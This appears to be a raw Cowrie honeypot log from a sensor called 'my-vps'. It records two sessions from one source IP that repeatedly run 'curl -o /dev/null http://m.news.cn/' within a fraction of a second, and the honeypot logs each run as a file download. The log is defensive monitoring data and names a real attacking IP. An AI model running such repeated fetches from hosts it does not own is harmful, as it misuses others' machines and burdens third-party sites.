{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.868142Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.869084Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.876982Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.886326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.887250Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.905034Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.905870Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.914933Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.924717Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.925559Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.940054Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.943227Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.946130Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.947047Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.972821Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.980512Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.981333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.984464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.985275Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.987160Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.021092Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.022902Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.027689Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.028916Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.033481Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.037538Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.043843Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.063686Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.064755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.068975Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.070101Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.082318Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.107841Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.108869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.111088Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.112624Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.121268Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.149584Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.150787Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.155742Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.156710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.161260Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.171238Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.190641Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.191933Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.197480Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.198204Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.200031Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.202293Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.209983Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.231113Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.232292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.234966Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.235740Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.252903Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.263961Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.266024Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.269235Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.275587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.276490Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.281318Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.282299Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.299688Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.313638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.314620Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.321929Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.324462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.325403Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.344324Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.351959Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.352826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.362264Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.363075Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.378133Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.389692Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.390805Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.401510Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.402710Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.409787Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.429915Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.431151Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.441919Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.445702Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.446829Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.461494Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.469365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
